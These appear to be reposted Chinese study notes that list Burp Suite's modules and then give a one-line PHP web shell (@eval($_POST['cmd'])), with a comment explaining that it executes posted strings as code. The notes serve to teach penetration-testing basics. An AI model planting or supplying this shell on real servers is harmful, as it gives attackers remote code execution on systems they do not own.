### Burp suite
1. Target(目标)-显示目标目录结构
2. Proxy(代理)-拦截HTTP/S的代理服务器,拦截,查看,修改浏览器与目标之间的数据流
3. Spider(爬虫)-枚举应用程序的内容和功能
4. Scanner(扫描器)-自动发现web应用程序的安全漏洞
5. Intruder(入侵)-对web进行自动化攻击
6. Repeater(中继器)-手动操作出发单独HTTP请求,并分析响应
7. Sequencer(会话)-分析令牌和数据项
8. Decoder(解码器)-解码器
9. Comparer(对比)-得到两个数据进行比较
10. Extender(拓展)-加载拓展
11. Options(设置)-设置
12. Alert(日志)—
---
一句话
```php
<?php@eval($_POST['cmd']);?> //用post方法获取cmd变量,把接收到的字符串交给eval,eval将它当作php代码执行
本文章为转载内容,我们尊重原作者对文章享有的著作权。如有内容错误或侵权问题,欢迎原作者联系我们进行内容更正或删除文章。
